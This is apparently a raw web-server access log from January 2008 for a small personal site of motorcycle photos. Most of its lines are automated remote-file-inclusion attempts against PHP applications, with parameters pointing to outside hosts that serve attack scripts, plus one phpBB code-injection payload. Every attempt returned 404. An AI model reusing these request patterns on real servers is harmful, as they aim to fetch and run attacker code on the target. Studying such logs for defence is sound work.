67.166.37.58 - - [15/Jan/2008:17:31:49 -0800] "GET /bikes/ HTTP/1.1" 200 2184 "http://www.dmulk.com/bikes/CreSTOC07/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
67.166.37.58 - - [15/Jan/2008:17:31:51 -0800] "GET /bikes/GPS/ HTTP/1.1" 200 677 "http://www.dmulk.com/bikes/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
74.6.20.136 - - [15/Jan/2008:17:35:18 -0800] "GET /bikes/CreSTOC07/?D=A HTTP/1.0" 200 15280 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.55.209.213 - - [15/Jan/2008:17:35:57 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.213 - - [15/Jan/2008:17:35:58 -0800] "GET / HTTP/1.0" 200 2946 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
74.6.7.121 - - [15/Jan/2008:17:39:21 -0800] "GET /minamijewelry/html/moon.html HTTP/1.0" 200 20921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.15.196.106 - - [15/Jan/2008:17:39:48 -0800] "GET /logs/access.log//templates/headline_temp.php?nst_inc=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [15/Jan/2008:17:39:49 -0800] "GET //templates/headline_temp.php?nst_inc=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [15/Jan/2008:17:39:49 -0800] "GET /logs//templates/headline_temp.php?nst_inc=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [15/Jan/2008:17:41:47 -0800] "GET /logs/access_071224.log//templates/headline_temp.php?nst_inc=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.206.143.90 - - [15/Jan/2008:17:43:22 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [15/Jan/2008:17:43:22 -0800] "GET /modules/My_eGallery/index.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [15/Jan/2008:17:43:23 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [15/Jan/2008:17:43:35 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [15/Jan/2008:17:43:36 -0800] "GET /modules/My_eGallery/index.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [15/Jan/2008:17:43:36 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [15/Jan/2008:17:44:00 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [15/Jan/2008:17:44:00 -0800] "GET /modules/My_eGallery/index.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [15/Jan/2008:17:44:01 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [15/Jan/2008:17:45:03 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [15/Jan/2008:17:45:03 -0800] "GET /modules/My_eGallery/index.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [15/Jan/2008:17:45:04 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.246.48.124 - - [15/Jan/2008:17:45:27 -0800] "GET //ws/get_events.php?includedir=http://www.geocities.com/mayam_anay/vaksin? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.20.38 - - [15/Jan/2008:17:46:49 -0800] "GET /tmp/?D=A HTTP/1.0" 200 812 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
71.136.51.92 - - [15/Jan/2008:17:49:45 -0800] "GET /bikes/dteel/ HTTP/1.1" 200 8401 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [15/Jan/2008:17:49:47 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [15/Jan/2008:17:50:37 -0800] "GET /bikes/dteel/15JAN08/ HTTP/1.1" 200 710 "http://www.dmulk.com/bikes/dteel/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.51.92 - - [15/Jan/2008:17:50:40 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 200 67485 "http://www.dmulk.com/bikes/dteel/15JAN08/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
72.15.196.106 - - [15/Jan/2008:17:52:04 -0800] "GET /logs/access_071224.log/skins/advanced/advanced1.php?pluginpath[0]=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [15/Jan/2008:17:52:09 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [15/Jan/2008:17:52:09 -0800] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.136.51.92 - - [15/Jan/2008:17:52:57 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?p=368120#post368120" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
207.164.26.199 - - [15/Jan/2008:17:54:39 -0800] "GET /bikes/GPS/WeSTOC2006/ HTTP/1.1" 200 849 "http://www.st-owners.com/forums/showthread.php?t=28267&page=20" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
207.164.26.199 - - [15/Jan/2008:17:54:43 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tablet PC 1.7; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
205.234.252.231 - - [15/Jan/2008:17:55:04 -0800] "GET /logs/access_071229.log//////////components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.231 - - [15/Jan/2008:17:55:04 -0800] "GET //////////components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.231 - - [15/Jan/2008:17:55:04 -0800] "GET /logs//////////components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.200.116.203 - - [15/Jan/2008:17:55:17 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 200 67485 "http://www.st-owners.com/forums/showthread.php?s=56cb2007ac87f7ac433202fc802d963e&p=368163" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.1; AOLBuild 4334.34; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
216.246.48.124 - - [15/Jan/2008:17:55:28 -0800] "GET //tools/send_reminders.php?includedir=http://www.geocities.com/mayam_anay/vaksin? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.18.167 - - [15/Jan/2008:17:55:36 -0800] "GET /logs/access_071228.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.18.167 - - [15/Jan/2008:17:55:37 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.18.167 - - [15/Jan/2008:17:55:37 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.231 - - [15/Jan/2008:17:56:16 -0800] "GET /logs/access_071228.log//////////components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.200.116.203 - - [15/Jan/2008:17:57:00 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 200 67485 "http://www.st-owners.com/forums/showthread.php?t=30553&page=7" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.1; AOLBuild 4334.34; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
70.86.201.130 - - [15/Jan/2008:17:57:08 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [15/Jan/2008:17:57:08 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [15/Jan/2008:17:57:08 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:17:57:26 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:17:57:26 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
70.86.201.130 - - [15/Jan/2008:17:58:11 -0800] "GET /logs/access_071228.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.188.10 - - [15/Jan/2008:17:58:14 -0800] "GET //main.php?sayfa=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
207.44.188.10 - - [15/Jan/2008:17:58:14 -0800] "GET /logs//main.php?sayfa=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
164.8.231.2 - - [15/Jan/2008:17:58:38 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
164.8.231.2 - - [15/Jan/2008:17:58:39 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
164.8.231.2 - - [15/Jan/2008:17:58:39 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.26.228 - - [15/Jan/2008:17:59:52 -0800] "GET /logs/access_070928.log HTTP/1.0" 200 16581 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.200.116.203 - - [15/Jan/2008:18:01:49 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 200 67485 "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.1; AOLBuild 4334.34; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.150.184.78 - - [15/Jan/2008:18:02:07 -0800] "GET /1000http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.222.110.249 - - [15/Jan/2008:18:02:15 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.44.188.10 - - [15/Jan/2008:18:02:44 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
207.44.188.10 - - [15/Jan/2008:18:03:17 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
202.180.216.12 - - [15/Jan/2008:18:04:22 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.180.216.12 - - [15/Jan/2008:18:04:30 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.180.216.12 - - [15/Jan/2008:18:04:30 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.20.144 - - [15/Jan/2008:18:06:07 -0800] "GET /?S=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.150.184.78 - - [15/Jan/2008:18:06:11 -0800] "GET /logs/access_071229.log/1000http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.150.184.78 - - [15/Jan/2008:18:06:11 -0800] "GET /logs/1000http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.180.216.12 - - [15/Jan/2008:18:07:07 -0800] "GET /logs/access_071228.log//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.170.162 - - [15/Jan/2008:18:08:48 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.170.162 - - [15/Jan/2008:18:08:49 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.170.162 - - [15/Jan/2008:18:08:50 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:18:11:10 -0800] "GET /logs/index.php?pagina1=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:18:11:10 -0800] "GET /index.php?pagina1=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
80.13.23.102 - - [15/Jan/2008:18:11:24 -0800] "GET /logs/access.log//templates/headline_temp.php?nst_inc=http://bazar.lancut.org/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.13.23.102 - - [15/Jan/2008:18:11:24 -0800] "GET //templates/headline_temp.php?nst_inc=http://bazar.lancut.org/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.13.23.102 - - [15/Jan/2008:18:11:25 -0800] "GET /logs//templates/headline_temp.php?nst_inc=http://bazar.lancut.org/id1.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.189.4.131 - - [15/Jan/2008:18:12:04 -0800] "GET /1000http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.252.231 - - [15/Jan/2008:18:15:40 -0800] "GET /logs/access_071229.log//////////modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.231 - - [15/Jan/2008:18:15:42 -0800] "GET /logs/access_071229.log//////////components/com_zoom/includes/database.php?mosConfig_absolute_path=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.231 - - [15/Jan/2008:18:15:42 -0800] "GET //////////components/com_zoom/includes/database.php?mosConfig_absolute_path=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.231 - - [15/Jan/2008:18:15:42 -0800] "GET /logs//////////components/com_zoom/includes/database.php?mosConfig_absolute_path=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.231 - - [15/Jan/2008:18:15:43 -0800] "GET //////////modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.231 - - [15/Jan/2008:18:15:43 -0800] "GET /logs//////////modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.231 - - [15/Jan/2008:18:15:49 -0800] "GET /logs/access.log//////////modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.206 - - [15/Jan/2008:18:16:58 -0800] "GET /logs/access_071225.log//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.206 - - [15/Jan/2008:18:16:58 -0800] "GET //multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.206 - - [15/Jan/2008:18:16:58 -0800] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.17.159 - - [15/Jan/2008:18:16:59 -0800] "GET /logs/access_071225.log//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.17.159 - - [15/Jan/2008:18:16:59 -0800] "GET //multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.17.159 - - [15/Jan/2008:18:17:00 -0800] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.188.10 - - [15/Jan/2008:18:17:09 -0800] "GET /index.php?pagina1=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
216.7.191.92 - - [15/Jan/2008:18:17:21 -0800] "GET /logs/access_071225.log//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.7.191.92 - - [15/Jan/2008:18:17:21 -0800] "GET //multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.7.191.92 - - [15/Jan/2008:18:17:21 -0800] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.15.196.106 - - [15/Jan/2008:18:17:26 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [15/Jan/2008:18:17:26 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [15/Jan/2008:18:17:26 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.11.230.30 - - [15/Jan/2008:18:17:30 -0800] "GET /logs/access.log/modules/4nAlbum/public/displayCategory.php?basepath=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.30 - - [15/Jan/2008:18:17:30 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.30 - - [15/Jan/2008:18:17:30 -0800] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.188.10 - - [15/Jan/2008:18:17:42 -0800] "GET /logs/index.php?pagina1=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
216.246.77.206 - - [15/Jan/2008:18:17:45 -0800] "GET /logs/access_071228.log//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.17.159 - - [15/Jan/2008:18:18:02 -0800] "GET /logs/access_071228.log//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.201.15 - - [15/Jan/2008:18:18:05 -0800] "GET /logs/access_071228.log//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.201.15 - - [15/Jan/2008:18:18:05 -0800] "GET //multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.201.15 - - [15/Jan/2008:18:18:06 -0800] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.7.191.92 - - [15/Jan/2008:18:18:07 -0800] "GET /logs/access_071228.log//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.189.4.131 - - [15/Jan/2008:18:18:25 -0800] "GET /logs/access_071225.log/1000http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.189.4.131 - - [15/Jan/2008:18:18:25 -0800] "GET /logs/1000http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.89.232.80 - - [15/Jan/2008:18:18:29 -0800] "GET /logs/access_071228.log//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.89.232.80 - - [15/Jan/2008:18:18:30 -0800] "GET //multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.89.232.80 - - [15/Jan/2008:18:18:30 -0800] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.190.144.116 - - [15/Jan/2008:18:18:40 -0800] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://dj4you.ch/vsd/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
62.148.173.160 - - [15/Jan/2008:18:18:42 -0800] "GET /logs/access_071228.log//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.148.173.160 - - [15/Jan/2008:18:18:43 -0800] "GET //multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.148.173.160 - - [15/Jan/2008:18:18:43 -0800] "GET /logs//multithumb/multithumb?mosConfig_absolute_path=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
